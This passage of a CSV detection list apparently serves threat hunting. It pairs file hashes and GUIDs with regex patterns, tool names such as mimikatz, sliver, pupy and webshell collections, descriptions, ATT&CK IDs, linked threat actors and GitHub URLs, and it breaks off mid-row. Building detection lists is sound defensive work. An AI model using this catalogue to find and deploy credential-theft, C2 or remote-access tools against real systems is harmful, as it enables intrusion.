"*299c708dd83186dda79639794e8ca637fe729b2bd2f6c5353bc5c52f64c7e29c*",".{0,1000}299c708dd83186dda79639794e8ca637fe729b2bd2f6c5353bc5c52f64c7e29c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23703" 
"*299c9eda11e70fdd9a0073ae0e45c6e2d8aee617eabd8ed6fb13adc8a890b674*",".{0,1000}299c9eda11e70fdd9a0073ae0e45c6e2d8aee617eabd8ed6fb13adc8a890b674.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","23704" "*29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9*",".{0,1000}29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23705" "*29ab009420cb687d2c1ec6e7aa68faad1a62215b7a92e70aa3731639d5ca1a69*",".{0,1000}29ab009420cb687d2c1ec6e7aa68faad1a62215b7a92e70aa3731639d5ca1a69.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23706" "*29aeb20a52144263d17c63c96b707a2d859aaae811acebd65d3ce605b26984a1*",".{0,1000}29aeb20a52144263d17c63c96b707a2d859aaae811acebd65d3ce605b26984a1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23707" "*29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729*",".{0,1000}29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23708" "*29b4ba00c47acb9059e19dd1acd4c6e83dfbd0af2e4cf0447892de04c6d1e8e4*",".{0,1000}29b4ba00c47acb9059e19dd1acd4c6e83dfbd0af2e4cf0447892de04c6d1e8e4.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","23710" "*29b6ac2ea4feac6530ab3f5401c99739ff8eea1f32f0a120fa971a9cef9bbfbb*",".{0,1000}29b6ac2ea4feac6530ab3f5401c99739ff8eea1f32f0a120fa971a9cef9bbfbb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23711" "*29be39614ae599a05f63c98c9d0c357869318adf49136dbbbeb51f04ab1ff62b*",".{0,1000}29be39614ae599a05f63c98c9d0c357869318adf49136dbbbeb51f04ab1ff62b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23714" "*29ca8dc96c56a1198bd34befa9fb5ba1571b24bf1f6f2f4c32eb55fbf47dc6ea*",".{0,1000}29ca8dc96c56a1198bd34befa9fb5ba1571b24bf1f6f2f4c32eb55fbf47dc6ea.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23715" "*29CBBC24-363F-42D7-B018-5EF068BA8777*",".{0,1000}29CBBC24\-363F\-42D7\-B018\-5EF068BA8777.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#GUIDproject","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","23717" "*29cf4b68c34663281bebc94f62c92282ca351839032140fcb2b0266d44a8bc84*",".{0,1000}29cf4b68c34663281bebc94f62c92282ca351839032140fcb2b0266d44a8bc84.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23718" "*29CFAA16-9277-4EFB-9E91-A7D11225160B*",".{0,1000}29CFAA16\-9277\-4EFB\-9E91\-A7D11225160B.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","#GUIDproject","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","23719" "*29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657*",".{0,1000}29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/ustayready/SharpHose","1","0","#filehash","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","23720" "*29da8a2c4876a0767f27fc5197704648c3a19058bc05895760d094ed41925c50*",".{0,1000}29da8a2c4876a0767f27fc5197704648c3a19058bc05895760d094ed41925c50.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23723" "*29df50927dfff1414f643367fcc9492dba40ebd2f518e1ec6cce25339ee73f6e*",".{0,1000}29df50927dfff1414f643367fcc9492dba40ebd2f518e1ec6cce25339ee73f6e.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","23724" "*29eb65e949707d372888fa09a691afd2d186e9ca6d97a5a7e89867468b675760*",".{0,1000}29eb65e949707d372888fa09a691afd2d186e9ca6d97a5a7e89867468b675760.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","23726" "*2a059074a33ed243a36891aea3adb60038f81401b3a9f0ec9282350e0450ec3a*",".{0,1000}2a059074a33ed243a36891aea3adb60038f81401b3a9f0ec9282350e0450ec3a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - 
T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23729" "*2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232*",".{0,1000}2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23730" "*2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6*",".{0,1000}2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23731" "*2a16d9cdb572f7860983402e56691cc4334bcc7c4f093528abe30bbcd8a2afd0*",".{0,1000}2a16d9cdb572f7860983402e56691cc4334bcc7c4f093528abe30bbcd8a2afd0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of 
outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23732" "*2a1db46df9455741f409b022318e2045f97095ea615400a71c99e413e9e5c9b9*",".{0,1000}2a1db46df9455741f409b022318e2045f97095ea615400a71c99e413e9e5c9b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23734" "*2a222cd3c05cdbf6db8c226743bbb46ce9e384c1f59e39072d60910b1099b80c*",".{0,1000}2a222cd3c05cdbf6db8c226743bbb46ce9e384c1f59e39072d60910b1099b80c.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","23735" "*2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0*",".{0,1000}2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23736" 
"*2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220*",".{0,1000}2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23737" "*2a3543146a8e544c425b5ffcb70dc00e0475e0c4de5bf8aae379ee04cf4d322a*",".{0,1000}2a3543146a8e544c425b5ffcb70dc00e0475e0c4de5bf8aae379ee04cf4d322a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23739" "*2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a*",".{0,1000}2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23740" "*2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede*",".{0,1000}2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","23742" "*2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce*",".{0,1000}2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23743" 
"*2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7*",".{0,1000}2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23745" "*2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c*",".{0,1000}2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23746" 
"*2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c*",".{0,1000}2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23747" "*2a7968aa8897afc8da0024530babe71fa7e6db8d31e5316a12c30e4221f198ef*",".{0,1000}2a7968aa8897afc8da0024530babe71fa7e6db8d31e5316a12c30e4221f198ef.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23750" "*2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340*",".{0,1000}2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23752" "*2a83ad9a1a2be9e1d7e3ddda77b758d6914fa72d94d75924e4579867a1cfeaf4*",".{0,1000}2a83ad9a1a2be9e1d7e3ddda77b758d6914fa72d94d75924e4579867a1cfeaf4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23753" "*2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d*",".{0,1000}2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","23754" "*2a90167209fbc5f0a2af9666eeeb1947c925efe72537e7bea4a384e8159777f1*",".{0,1000}2a90167209fbc5f0a2af9666eeeb1947c925efe72537e7bea4a384e8159777f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23755" "*2a95a39ae2f86f2479690a7b54ad9038be74c8b95e4a978f4975f7c8f0d028d9*",".{0,1000}2a95a39ae2f86f2479690a7b54ad9038be74c8b95e4a978f4975f7c8f0d028d9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23756" "*2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819*",".{0,1000}2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23757" "*2aa4f05b7acf28440538a3295d015e9dbbb919730d225e6b2f1051e328f6b3c4*",".{0,1000}2aa4f05b7acf28440538a3295d015e9dbbb919730d225e6b2f1051e328f6b3c4.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","23758" "*2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3*",".{0,1000}2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23759" "*2ab55fdad5aa04a7a7a68b1284869347a1589891476cb03089c9106cff8e2d38*",".{0,1000}2ab55fdad5aa04a7a7a68b1284869347a1589891476cb03089c9106cff8e2d38.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - 
